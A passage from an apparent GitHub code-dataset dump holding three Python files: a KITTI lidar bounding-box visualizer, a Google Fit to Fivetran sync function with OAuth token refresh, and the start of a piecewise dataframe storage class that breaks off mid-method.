Drive/kitti/label/training/label_2/002394.txt'\n# calib_pathname = '/media/alex/Seagate Expansion Drive/kitti/calib/training/calib/002394.txt'\n\n# use my own tool\n# pc_pathname = '/home/alex/github/waymo_to_kitti_converter/tools/waymo_kitti/velodyne/00000-00000.bin'\n# label_pathname = '/home/alex/github/waymo_to_kitti_converter/tools/waymo_kitti/label_all/00000-00000.txt'\n# calib_pathname = '/home/alex/github/waymo_to_kitti_converter/tools/waymo_kitti/calib/00000-00000.txt'\n\npc_pathname = '/home/caizhongang/playground/kitti/test_point_cloud/006985.bin'\nlabel_pathname = '/home/caizhongang/playground/kitti/test_label/006985.txt'\ncalib_pathname = '/home/caizhongang/playground/kitti/test_calib/006985.txt'\n\n# pc_range = [0, -40, -3.0, 70.4, 40, 3.0]\npc_range = None\n\n# def read_calib_file(filepath):\n# \"\"\"Read in a calibration file and parse into a dictionary.\"\"\"\n# data = {}\n#\n# with open(filepath, 'r') as f:\n# for line in f.readlines():\n# print('line', line)\n# key, value = line.split(':', 1)\n# # The only non-float values in these files are dates, which\n# # we don't care about anyway\n# try:\n# data[key] = np.array([float(x) for x in value.split()])\n# except ValueError:\n# pass\n#\n# return data\n\n\ndef in_hull(p, hull):\n \"\"\"\n :param p: (N, K) test points\n :param hull: (M, K) M corners of a box\n :return (N) bool\n \"\"\"\n try:\n if not isinstance(hull, Delaunay):\n hull = Delaunay(hull)\n flag = hull.find_simplex(p) >= 0\n except scipy.spatial.qhull.QhullError:\n print('Warning: not a hull %s' % str(hull))\n flag = np.zeros(p.shape[0], dtype=np.bool)\n\n return flag\n\n\ndef corners_to_lines(qs):\n \"\"\" Draw 3d bounding box in image\n qs: (8,3) array of vertices for the 3d box in following order:\n 7 -------- 4\n /| /|\n 6 -------- 5 .\n | | | |\n . 3 -------- 0\n |/ |/\n 2 -------- 1\n \"\"\"\n idx = [(1,0), (5,4), (2,3), (6,7), (1,2), (5,6), (0,3), (4,7), (1,5), (0,4), (2,6), (3,7)]\n\n # print('draw bbox')\n # print('qs', qs)\n\n line_set = o3d.geometry.LineSet(\n points=o3d.utility.Vector3dVector(qs),\n lines=o3d.utility.Vector2iVector(idx),\n )\n\n return line_set\n\n\ndef boxes3d_to_corners3d_lidar(boxes3d, bottom_center=True):\n \"\"\"\n :param boxes3d: (N, 7) [x, y, z, w, l, h, ry] in LiDAR coords, see the definition of ry in KITTI dataset\n :param z_bottom: whether z is on the bottom center of object\n :return: corners3d: (N, 8, 3)\n 7 -------- 4\n /| /|\n 6 -------- 5 .\n | | | |\n . 3 -------- 0\n |/ |/\n 2 -------- 1\n \"\"\"\n boxes_num = boxes3d.shape[0]\n w, l, h = boxes3d[:, 3], boxes3d[:, 4], boxes3d[:, 5]\n x_corners = np.array([w / 2., -w / 2., -w / 2., w / 2., w / 2., -w / 2., -w / 2., w / 2.], dtype=np.float32).T\n y_corners = np.array([-l / 2., -l / 2., l / 2., l / 2., -l / 2., -l / 2., l / 2., l / 2.], dtype=np.float32).T\n if bottom_center:\n z_corners = np.zeros((boxes_num, 8), dtype=np.float32)\n z_corners[:, 4:8] = h.reshape(boxes_num, 1).repeat(4, axis=1) # (N, 8)\n else:\n z_corners = np.array([-h / 2., -h / 2., -h / 2., -h / 2., h / 2., h / 2., h / 2., h / 2.], dtype=np.float32).T\n\n ry = boxes3d[:, 6]\n zeros, ones = np.zeros(ry.size, dtype=np.float32), np.ones(ry.size, dtype=np.float32)\n\n # print('ry\\n', ry)\n\n rot_list = np.array([[np.cos(ry), -np.sin(ry), zeros],\n [np.sin(ry), np.cos(ry), zeros],\n [zeros, zeros, ones]]) # (3, 3, N)\n R_list = np.transpose(rot_list, (2, 0, 1)) # (N, 3, 3)\n\n # print('Rot\\n', R_list[-1])\n\n temp_corners = np.concatenate((x_corners.reshape(-1, 8, 1), y_corners.reshape(-1, 8, 1),\n z_corners.reshape(-1, 8, 1)), axis=2) # (N, 8, 3)\n\n # print('corners', temp_corners[-1])\n\n rotated_corners = np.matmul(temp_corners, R_list) # (N, 8, 3)\n\n # print('rotated_corners', rotated_corners[-1])\n\n x_corners, y_corners, z_corners = rotated_corners[:, :, 0], rotated_corners[:, :, 1], rotated_corners[:, :, 2]\n\n x_loc, y_loc, z_loc = boxes3d[:, 0], boxes3d[:, 1], boxes3d[:, 2]\n\n x = x_loc.reshape(-1, 1) + x_corners.reshape(-1, 8)\n y = y_loc.reshape(-1, 1) + y_corners.reshape(-1, 8)\n z = z_loc.reshape(-1, 1) + z_corners.reshape(-1, 8)\n\n # print('bbox\\n', np.stack([x_loc, y_loc, z_loc, w, l, h, ry], axis=0).T)\n\n corners = np.concatenate((x.reshape(-1, 8, 1), y.reshape(-1, 8, 1), z.reshape(-1, 8, 1)), axis=2)\n\n # print('shifted_corners\\n', corners[-1])\n # print(corners.shape)\n\n return corners.astype(np.float32)\n\n\ndef transform_pc(pc, R0, V2C):\n tf = np.matmul(R0, V2C)\n assert pc.shape[1] == 3\n pc = np.transpose(pc)\n ones = np.ones((1, pc.shape[1]))\n pc = np.vstack([pc, ones])\n tf_pc = np.matmul(tf, pc)\n #tf_pc = tf_pc[:3, :] / tf[3, :]\n tf_pc = np.transpose(tf_pc)\n return tf_pc\n\n\ndef filter_range(pc, pc_range):\n xmin, ymin, zmin, xmax, ymax, zmax = pc_range\n cond1 = xmin < pc[:, 0]\n cond2 = pc[:, 0] < xmax\n cond3 = ymin < pc[:, 1]\n cond4 = pc[:, 1] < ymax\n cond5 = zmin < pc[:, 2]\n cond6 = pc[:, 2] < zmax\n\n # print(cond1, cond2, cond3, cond4, cond5, cond6)\n\n s = (cond1.astype(np.int) + cond2.astype(np.int) + cond3.astype(np.int) + cond4.astype(np.int) + cond5.astype(np.int) + cond6.astype(np.int))\n # print(s)\n\n select = s == 6\n # print(sum(select), len(select))\n return pc[select]\n\n\ndef main():\n # visualized in lidar frame\n\n # pc = pk_utils.load_velo_scan(pc_pathname)\n pc = np.fromfile(pc_pathname, dtype=np.float32).reshape(-1, 4)\n # print('pc', pc)\n\n if pc_range is not None:\n pc = filter_range(pc, pc_range)\n\n # print('pc, just loaded', pc.shape)\n pc = pc[:, :3]\n # print('pc, after slicing', pc.shape)\n\n # objs = utils.read_label(label_pathname)\n # calib = pk_utils.read_calib_file(calib_pathname)\n # calib = read_calib_file(calib_pathname)\n\n # V2C = np.array(calib['Tr_velo_to_cam']).reshape(3,4)\n # R0 = np.array(calib['R0_rect']).reshape(3,3)\n # P0 = np.array(calib['P0']).reshape(3,4)\n\n # print(V2C, R0, P0)\n\n # pc = transform_pc(pc, R0, V2C)\n\n # print(pc.shape)\n\n obj_list = get_objects_from_label(label_pathname)\n obj_list = [o for o in obj_list if o.cls_type in ['Car', 'Pedestrian', 'Cyclist']]\n calib = Calibration(calib_pathname)\n\n loc = np.concatenate([obj.loc.reshape(1, 3) for obj in obj_list], axis=0)\n dims = np.array([[obj.l, obj.h, obj.w] for obj in obj_list]) # lhw(camera) format\n rots = np.array([obj.ry for obj in obj_list])\n loc_lidar = calib.rect_to_lidar(loc)\n\n # print('loc\\n', loc)\n # print('loc_lidar\\n', loc_lidar)\n\n l, h, w = dims[:, 0:1], dims[:, 1:2], dims[:, 2:3]\n gt_boxes_lidar = np.concatenate([loc_lidar, w, l, h, rots[..., np.newaxis]], axis=1)\n\n print(gt_boxes_lidar)\n\n corners = boxes3d_to_corners3d_lidar(gt_boxes_lidar)\n\n # corners_lidar = calib.rect_to_lidar(corners)\n\n # bboxes3d = []\n # for o in objs:\n # bbox2d, bbox3d = utils.compute_box_3d(o, P0)\n # bboxes3d.append(bbox3d)\n\n num_points_in_gt = -np.ones(len(corners), dtype=np.int32)\n\n bboxes3d = []\n for i in range(corners.shape[0]):\n bboxes3d.append(corners[i])\n flag = in_hull(pc, corners[i])\n num_points_in_gt[i] = flag.sum()\n\n # gt_boxes_lidar_temp = gt_boxes_lidar.copy()\n # # print('bef\\n', gt_boxes_lidar_temp[:, 6])\n # # gt_boxes_lidar_temp[:, 6] = gt_boxes_lidar_temp[:, 6] - np.pi / 2\n # # print('aft\\n', gt_boxes_lidar_temp[:, 6])\n # num_points_in_gt_waymo = compute_num_points_in_box_3d(tf.convert_to_tensor(pc.astype(np.float32), dtype=tf.float32), tf.convert_to_tensor(gt_boxes_lidar_temp.astype(np.float32), dtype=tf.float32))\n #\n # print(pc, gt_boxes_lidar)\n print('PCDet:', num_points_in_gt)\n\n # print(tf.convert_to_tensor(pc.astype(np.float32), dtype=tf.float32), tf.convert_to_tensor(gt_boxes_lidar_temp.astype(np.float32), dtype=tf.float32))\n # print('Waymo:', num_points_in_gt_waymo.numpy())\n\n # draw\n pcd = o3d.geometry.PointCloud()\n # print(pc)\n pcd.points = o3d.utility.Vector3dVector(pc)\n\n axis = o3d.geometry.TriangleMesh.create_coordinate_frame(\n size=1, origin=[0,0,0])\n\n visual = [pcd, axis]\n # visual = [pcd]\n #\n # print('add bbox3d')\n for bbox3d in bboxes3d:\n # print(bbox3d)\n visual.append(corners_to_lines(bbox3d))\n\n\n\n o3d.visualization.draw_geometries(visual)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"caizhongang/waymo_kitti_converter","sub_path":"tools/kitti_label_visualizer.py","file_name":"kitti_label_visualizer.py","file_ext":"py","file_size_in_byte":9248,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"4184107676","text":"import datetime as dt\nimport requests as rq\n\nfrom dateutil import parser, tz\nfrom requests.auth import HTTPBasicAuth\n\n\ndef refresh_oauth_token(request):\n \"\"\"Refresh an OAuth2 \"Authorization Code Grant Flow\" refresh token.\n\n Parameters\n ----------\n request: flask.Request\n GCP Cloud Function request context. The request will match this spec:\n https://fivetran.com/docs/functions#requestformat\n\n Returns\n -------\n dict\n A new refresh and access token pair\n \"\"\"\n\n request_json = request.get_json()\n\n content_header = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n\n post_params = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": request_json[\"state\"][\"refresh_token\"],\n }\n\n resp = rq.post(\n \"https://oauth2.googleapis.com/token\",\n headers=content_header,\n params=post_params,\n auth=HTTPBasicAuth(\n request_json[\"secrets\"][\"GFIT_CLIENT_ID\"],\n request_json[\"secrets\"][\"GFIT_CLIENT_SECRET\"],\n ),\n )\n\n if resp.status_code != 200:\n raise ValueError(f\"OAuth token refresh request returned {resp.json()}\")\n\n new_token = resp.json()\n\n return new_token\n\n\ndef handler(request):\n \"\"\"Scrape data from Google Fit.\n\n Parameters\n ----------\n request: flask.Request\n GCP Cloud Function request context. The request will match this spec:\n https://fivetran.com/docs/functions#requestformat\n\n Returns\n -------\n dict\n A response matching this spec:\n https://fivetran.com/docs/functions#responseformat\n \"\"\"\n\n request_json = request.get_json()\n\n # initialize state for the case when fivetran is starting from scratch.\n # put initial values for the cursor and tokens in the 'secrets' node.\n # fivetran should automatically keep track of subsequent updates in the\n # 'state' node.\n if \"cursor\" not in request_json[\"state\"]:\n request_json[\"state\"][\"cursor\"] = request_json[\"secrets\"][\"cursor\"]\n if \"access_token\" not in request_json[\"state\"]:\n request_json[\"state\"][\"access_token\"] = request_json[\"secrets\"][\"access_token\"]\n if \"refresh_token\" not in request_json[\"state\"]:\n request_json[\"state\"][\"refresh_token\"] = request_json[\"secrets\"][\"refresh_token\"]\n\n cursor = request_json[\"state\"][\"cursor\"]\n cursor_date = parser.parse(cursor).date()\n\n if cursor_date > dt.date.today():\n raise ValueError(\n f\"cursor value {cursor_date.isoformat()} is later than \"\n f\"today's date {dt.date.today().isoformat()}\"\n )\n\n # if the cursor is at the current date return immediately without\n # incrementing the cursor. This is to ensure we don't pull data for a day\n # until that day is over.\n if cursor_date == dt.date.today():\n return {\n 'state': request_json['state'],\n \"hasMore\": False,\n 'returnCause': 'Cursor date not complete yet',\n }\n\n # otherwise the cursor must be in the past so go ahead and pull data\n headers = {\n \"Accept-Language\": \"en_US\",\n \"Authorization\": f'Bearer {request_json[\"state\"][\"access_token\"]}',\n }\n\n # control pagination with startTime and endTime parameters which have to be\n # RFC3339 timestamps. in this case this means adding a timezone. See:\n # https://developers.google.com/fit/rest/v1/reference/users/sessions/list#parameters\n start_date = cursor_date\n end_date = cursor_date + dt.timedelta(days=1)\n\n params = {\n # hardcoding 'America/Chicago' timezone because that makes the date\n # cursor intuitive for my data\n \"startTime\": dt.datetime(\n start_date.year,\n start_date.month,\n start_date.day,\n tzinfo=tz.gettz(\"America/Chicago\"),\n ).isoformat(),\n \"endTime\": dt.datetime(\n end_date.year,\n end_date.month,\n end_date.day,\n tzinfo=tz.gettz(\"America/Chicago\"),\n ).isoformat(),\n }\n\n sessions = rq.get(\n \"https://www.googleapis.com/fitness/v1/users/me/sessions\",\n headers=headers,\n params=params,\n )\n\n # the google fit API returns a 401 code when the access token has expired\n if sessions.status_code == 401:\n\n new_token = refresh_oauth_token(request)\n\n # apparently the way Google APIs do OAuth the refresh token never\n # expires and so doesn't need to be refreshed itself\n # c.f. https://developers.google.com/identity/protocols/oauth2/web-server#offline\n # c.f. https://stackoverflow.com/questions/8942340/get-refresh-token-google-api\n return {\n \"state\": {\n \"cursor\": cursor_date.isoformat(),\n \"access_token\": new_token[\"access_token\"],\n \"refresh_token\": request_json[\"state\"][\"refresh_token\"],\n },\n \"hasMore\": True,\n 'returnCause': 'OAuth token required refresh',\n }\n\n # parse the response from the Google Fit API\n sessions_json = sessions.json()\n\n sessions_insert = [\n {\n \"date\": cursor_date.isoformat(),\n \"id\": sess[\"id\"],\n \"name\": sess[\"name\"],\n \"description\": sess[\"description\"],\n \"start_time_millis\": sess[\"startTimeMillis\"],\n \"end_time_millis\": sess[\"endTimeMillis\"],\n \"modified_time_millis\": sess[\"modifiedTimeMillis\"],\n \"source\": sess[\"application\"][\"packageName\"],\n }\n for sess in sessions_json[\"session\"]\n ]\n\n return {\n \"state\": {\n \"cursor\": (cursor_date + dt.timedelta(days=1)).isoformat(),\n \"access_token\": request_json[\"state\"][\"access_token\"],\n \"refresh_token\": request_json[\"state\"][\"refresh_token\"],\n },\n \"insert\": {\"sessions\": sessions_insert if sessions_insert else None},\n \"schema\": {\n \"sessions\": {\"primary_key\": [\"date\", \"id\"]},\n },\n \"hasMore\": True,\n }\n","repo_name":"hinnefe2/exercise_dashboard","sub_path":"cloud_functions/googlefit/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"86261411307","text":"from general import *\n\n\n\n\nclass BaseFEFS():\n \n ##########################################################################################################\n ########################################## Class Variables: BEG ##########################################\n extension = \"fefs\"\n index_df_name = \".index.csv\"\n meta_json_name = \".meta.json\"\n # Levels: 0) \"update\", 1) \"split\", 2) \"merge\", 3) \"save\", 4) \"delete\", 5) \"\".\n action_domain = [\"update\", \"split\", \"merge\", \"save\", \"delete\", \"\"]\n ########################################## Class Variables: END ##########################################\n ##########################################################################################################\n\n \n def print_info(self):\n print(\"path:\",self.path, \", name:\", self.name)\n print(\"pieces:\", self.pieces)\n print(\"types:\", self.types)\n print(\"fr:\", self.fr, \", to:\", self.to)\n \n print_frs = self.frs\n print_tos = self.tos\n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n try:\n print_frs = [ self.seq_inv_trans_method(fr) for fr in self.frs ]\n print_tos = [ self.seq_inv_trans_method(to) for to in self.tos ]\n except: \n pass\n else:\n assert self.seq_trans_method is None\n \n print(\"frs:\", print_frs)\n print(\"tos:\", print_tos)\n \n \n print(\"seq_col:\", self.seq_col)\n \n print(\"piece_name_len:\", self.piece_name_len)\n print(\"colnames:\", self.colnames, \", row_cnt:\", self.row_cnt)\n print(\"row_cnts:\", self.row_cnts)\n print(\"actions:\", self.actions, \", action_params:\", self.action_params)\n print(\"cache:\", self.cache, \", cache_config:\", self.cache_config)\n if self.dfs is None:\n print(\"dfs:\", self.dfs)\n else:\n print(\"dfs:\", [ \"Non-emtpy\" if df is not None else df for df in self.dfs ])\n return\n\n\n\n ###########################################################################################################\n ############################################ Init methods: BEG ############################################\n def __init__(self):\n \n self.verbose = False\n \n # It has to be followed by self.read()\n self.path = None\n self.name = None\n \n # Keys from dict_meta\n self.max_row_per_piece = None\n self.row_cnt = None\n # self.datetime_format = None\n self.seq_col = None\n \n self.piece_name_len = None\n self.fr = None\n self.to = None\n self.colnames = None\n self.cache_config = None\n \n # Columns from df_index\n self.pieces = None\n self.types = None\n self.frs = None\n self.tos = None\n self.row_cnts = None\n \n \n # Following are not columns in df_index\n \"\"\"\n Levels: 0) \"update\", 1) \"split\", 2) \"merge\", 3) \"save\", 4) \"delete\", 5) \"\".\n \n - \"\" : Nothing to do\n - \"update\" : Update df_index's fr and to, and update meta's fr and to.\n After finishing the update, action will become \"save\".\n - \"save\" : Save file to the same piece name. \n - \"delete\" : Delete file, remove from all lists, update meta's fr and to.\n - \"split\" : Retain this file, create another one(s). Both/all leave with a \"update\" action.\n - \"merge\",i : Find i in params, retain this file, leave this with a \"save\" action,\n the index i file with a \"delete\" action. \n \"\"\"\n self.actions = None\n self.action_params = None\n self.dfs = None # the elements can be df or FEFS\n \n # Cache section\n self.cache = None\n \n self.seq_trans_method = None\n self.seq_inv_trans_method = None\n self.seq_read_dtype = None\n self.seq_type = None\n \n \n\n\n @classmethod\n def create(cls, dict_meta, name, path=None):\n \"\"\"\n Usecase\n --------\n When you start with nothing but will add dataframes subsequently.\n \"\"\"\n \n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert cls != BaseFEFS\n \n \n # It is supposed to be followed by fefs += df\n fefs = cls()\n \n if path is None:\n path = os.getcwd()\n fefs.path = path\n fefs.name = name\n \n \n fefs.row_cnt = None\n fefs.fr = None\n fefs.to = None \n fefs.pieces = []\n fefs.types = []\n \n fefs.frs = []\n fefs.tos = []\n fefs.row_cnts = []\n\n fefs.actions = []\n fefs.action_params = []\n fefs.dfs = []\n\n # Cache section\n fefs.cache = []\n \n \n # Keys from dict_meta\n fefs = fefs.load_meta(dict_meta)\n \n \n return fefs\n \n\n\n def __check_cache_config(self):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n \"\"\"\n cache_config = {\"rows_in_cache\":1000000, \"len_of_cache\":None}\n or \n cache_config = {\"rows_in_cache\":None, \"len_of_cache\":10}\n \"\"\"\n cache_config = self.cache_config\n assert isinstance(cache_config,dict)\n assert (\"rows_in_cache\" in cache_config.keys()) and (\"len_of_cache\" in cache_config.keys())\n assert (cache_config[\"rows_in_cache\"] is None) or (cache_config[\"len_of_cache\"] is None)\n assert (cache_config[\"rows_in_cache\"] is not None) or (cache_config[\"len_of_cache\"] is not None)\n \n \n\n \n def load_meta(self,dict_meta):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n # Keys from dict_meta\n self.max_row_per_piece = dict_meta[\"max_row_per_piece\"]\n # self.datetime_format = dict_meta[\"datetime_format\"]\n self.seq_col = dict_meta[\"seq_col\"]\n \n self.piece_name_len = dict_meta[\"piece_name_len\"]\n self.colnames = dict_meta[\"colnames\"]\n self.cache_config = dict_meta[\"cache_config\"]\n self.__check_cache_config()\n \n try:\n self.row_cnt = dict_meta[\"row_cnt\"]\n except:\n pass\n\n\n\n # dtf = self.datetime_format\n try:\n self.fr = dict_meta[\"fr\"]\n self.to = dict_meta[\"to\"]\n if self.seq_trans_method is not None:\n assert self.seq_inv_trans_method is not None\n self.fr = self.seq_trans_method(self.fr)\n self.to = self.seq_trans_method(self.to)\n except:\n pass\n\n return self\n\n\n\n def dump_meta(self):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n # Keys from dict_meta\n dict_meta = {}\n dict_meta[\"max_row_per_piece\"] = self.max_row_per_piece\n # dict_meta[\"datetime_format\"] = self.datetime_format\n dict_meta[\"seq_col\"] = self.seq_col\n \n dict_meta[\"piece_name_len\"] = self.piece_name_len\n dict_meta[\"colnames\"] = self.colnames\n dict_meta[\"cache_config\"] = self.cache_config\n\n try:\n dict_meta[\"row_cnt\"] = self.row_cnt\n except:\n pass\n\n # dtf = self.datetime_format\n try:\n dict_meta[\"fr\"] = self.fr\n dict_meta[\"to\"] = self.to\n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n dict_meta[\"fr\"] = self.seq_inv_trans_method(self.fr)\n dict_meta[\"to\"] = self.seq_inv_trans_method(self.to)\n except:\n pass\n \n return dict_meta\n\n\n\n def load_index_df(self, df_index, orders=None):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n if len(df_index) == 0:\n self.pieces = []\n self.types = []\n self.frs = []\n self.tos = []\n self.row_cnts = []\n return self\n\n # dtf = self.datetime_format\n if self.seq_trans_method is not None:\n assert self.seq_inv_trans_method is not None\n df_index[\"fr\"] = df_index[\"fr\"].apply(lambda x: self.seq_trans_method(x))\n df_index[\"to\"] = df_index[\"to\"].apply(lambda x: self.seq_trans_method(x))\n df_index = df_index.sort_values(by=\"fr\").reset_index(drop=True)\n \n self.pieces = list(df_index[\"piece\"])\n self.types = list(df_index[\"type\"])\n self.frs = list(df_index[\"fr\"])\n self.tos = list(df_index[\"to\"])\n self.row_cnts = list(df_index[\"row_cnt\"])\n \n try:\n self.fr, self.to = min(self.frs), max(self.tos)\n self.row_cnt = sum(self.row_cnts)\n except:\n pass\n \n \n if orders is not None:\n self.dfs = [ self.dfs[order_] for order_ in orders ]\n self.actions = [ self.actions[order_] for order_ in orders ]\n self.action_params = [ self.action_params[order_] for order_ in orders ]\n \"\"\"\n Let's say \n orders = [3,5,4,0,2,1] => idx3 -> idx0, idx5 -> idx1, ...\n If cache = [4,3,5] \n => [ orders.index(4), orders.index(3), orders.index(1) ]\n \"\"\"\n self.cache = [ orders.index(cac) for cac in self.cache ]\n \n return self\n\n\n \n def dump_index_df(self):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df_empty = pd.DataFrame({\"piece\":[],\"type\":[],\"fr\":[],\"to\":[],\"row_cnt\":[]})\n empty_orders = list(df_empty.index)\n if self.pieces is None:\n assert all([ l is None for l in [self.types, self.frs, self.tos, self.row_cnts] ])\n return (df_empty, empty_orders)\n elif len(self.pieces) == 0:\n assert all([ len(l)==0 for l in [self.types, self.frs, self.tos, self.row_cnts] ])\n return (df_empty, empty_orders)\n \n df_index = pd.DataFrame()\n df_index[\"piece\"] = self.pieces\n df_index[\"type\"] = self.types\n df_index[\"fr\"] = self.frs\n df_index[\"to\"] = self.tos\n df_index[\"row_cnt\"] = self.row_cnts\n df_index = df_index.sort_values(by=\"fr\")\n orders = list(df_index.index)\n df_index = df_index.reset_index(drop=True)\n \n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n df_index[\"fr\"] = df_index[\"fr\"].apply(lambda x: self.seq_inv_trans_method(x))\n df_index[\"to\"] = df_index[\"to\"].apply(lambda x: self.seq_inv_trans_method(x))\n \n return (df_index, orders)\n \n\n \n def clone(self, path, name):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n # It is supposed to be followed by fefs += df\n fefs = self.__class__()\n \n fefs.path = path\n fefs.name = name\n \n fefs.max_row_per_piece = self.max_row_per_piece\n # fefs.datetime_format = self.datetime_format\n fefs.seq_col = self.seq_col\n \n fefs.piece_name_len = self.piece_name_len\n fefs.colnames = dc(self.colnames)\n fefs.cache_config = dc(self.cache_config)\n fefs.fr = self.fr\n fefs.to = self.to\n fefs.row_cnt = self.row_cnt\n \n fefs.pieces = dc(self.pieces)\n fefs.types = dc(self.types)\n fefs.frs = dc(self.frs)\n fefs.tos = dc(self.tos)\n fefs.row_cnts = dc(self.row_cnts)\n\n fefs.actions = dc(self.actions)\n fefs.action_params = dc(self.action_params)\n fefs.dfs = [ dc(df_) for df_ in self.dfs ]\n \n # # Cache section\n fefs.cache = dc(self.cache)\n \n \n # compensating codes for self.dfs[idx] is None\n for idx in range(len(fefs.pieces)):\n \n if self.dfs[idx] is None:\n \n assert fefs.dfs[idx] is None\n assert self.pieces[idx] == fefs.pieces[idx] \n \n piece = self.pieces[idx] \n src = self.__compose_piece_fullname(piece)\n dst = fefs.__compose_piece_fullname(piece)\n fefs_fullname = fefs.__compose_fullpath()\n if not os.path.isdir(fefs_fullname):\n os.mkdir(fefs_fullname)\n # print(\"Command:\", \"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n os.system(\"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n \n elif self.actions[idx] == \"\": # i.e., self.dfs[idx] is not None but no \"save\" command\n fefs.actions[idx] = \"save\"\n\n return fefs\n\n ############################################ Init methods: END ############################################\n ###########################################################################################################\n \n\n \n \n \n \n \n \n \n \n \n ##########################################################################################################\n ######################################### Path, Name, Piece: BEG #########################################\n @staticmethod\n def get_random_string(n):\n # choose from all lowercase letter\n letters = string.ascii_lowercase\n result_str = ''.join(random.choice(letters) for i in range(n))\n return result_str\n \n def gen_valid_piece(self, prefix=\"\", suffix=\"\"):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n while True:\n piece = self.__class__.get_random_string(self.piece_name_len)\n piece = prefix + piece + suffix\n if piece not in self.pieces:\n break\n return piece\n\n \n def __decompose_fullpath(self, fullpath):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n path = fullpath.split('/')\n name = path[-1]\n path = '/'.join(path[:-1])\n \n names = name.split('.')\n assert names[-1] == self.__class__.extension\n name = '.'.join(names[:-1])\n return (path,name)\n \n\n def __decompose_piece_fullname(self,piece_fullname):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n\n fullpath = piece_fullname.split('/')\n piece = fullpath[-1]\n fullpath = '/'.join(fullpath[:-1])\n path, name = self.__decompose_fullpath(fullpath)\n return (path,name,piece)\n\n\n def __compose_fullpath(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n fullpath = '/'.join([self.path, self.name + '.' + self.__class__.extension])\n return fullpath\n \n\n def __compose_piece_fullname(self,piece):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n fullname = '/'.join([self.__compose_fullpath(), piece])\n return fullname\n\n \n def file_exists(self):\n fullpath = self.__compose_fullpath()\n return os.path.isdir(fullpath)\n \n ######################################### Path, Name, Piece: END #########################################\n ##########################################################################################################\n\n\n \n \n \n def vprint(self,*value):\n try:\n if self.verbose: # may not have the explicit self.verbose attribute\n print(value)\n except:\n pass\n \n \n \n def has_valid_status(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n attributes = [\n self.path, self.name, self.max_row_per_piece, self.row_cnt, \n self.seq_col,\n self.piece_name_len, self.fr, self.to, self.colnames, \n self.pieces, self.types,\n self.frs, self.tos, self.row_cnts, self.dfs, self.actions, self.action_params\n ]\n if any([ attr is None for attr in attributes ]):\n return False\n \n lists = [ self.pieces, self.types, self.frs, self.tos, self.row_cnts ]\n if any([ val is None for list_ in lists for val in list_ ]):\n return False\n return True\n \n \n \n @classmethod\n def get_index(cls,df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert cls != BaseFEFS\n \n \n if isinstance(df,pd.DataFrame):\n return list(df.index)\n elif isinstance(df,cls):\n fefs = df\n indices = list(range(fefs.row_cnt))\n return indices\n else:\n print(\"Type\", type(df), \"not supported\")\n assert False\n \n\n \n\n def __read_piece(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n piece = self.pieces[idx]\n type_ = self.types[idx]\n fullname = self.__compose_piece_fullname(piece)\n if type_ == \"csv\":\n\n if self.seq_read_dtype is None:\n df = pd.read_csv(fullname)\n else:\n df = pd.read_csv(fullname, dtype={self.seq_col:self.seq_read_dtype})\n\n # dtf = self.datetime_format\n if self.seq_trans_method is not None:\n assert self.seq_inv_trans_method is not None\n df[self.seq_col] = df[self.seq_col].apply(lambda x: self.seq_trans_method(x)) \n\n df = df.sort_values(by=self.seq_col).reset_index(drop=True)\n \n self.dfs[idx] = df\n return self.dfs[idx]\n \n elif type_ == self.__class__.__name__:\n \n fefs = self.__class__()\n fullname += '.' + self.__class__.extension\n fefs.read(fullname)\n self.dfs[idx] = fefs\n return self.dfs[idx]\n \n else:\n print(\"File type \\\"%s\\\" not yet implemented\"%str(type_))\n assert False\n \n \n \n def __write_piece(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df = self.dfs[idx]\n assert df is not None\n\n fefs_fullname = self.__compose_fullpath()\n if not os.path.isdir(fefs_fullname):\n os.mkdir(fefs_fullname)\n \n type_ = self.types[idx]\n piece = self.pieces[idx]\n fullname = self.__compose_piece_fullname(piece)\n \n if type_ == \"csv\":\n \n df = df.sort_values(by=self.seq_col).reset_index(drop=True)\n \n self.dfs[idx] = df\n # dtf = self.datetime_format\n df2 = 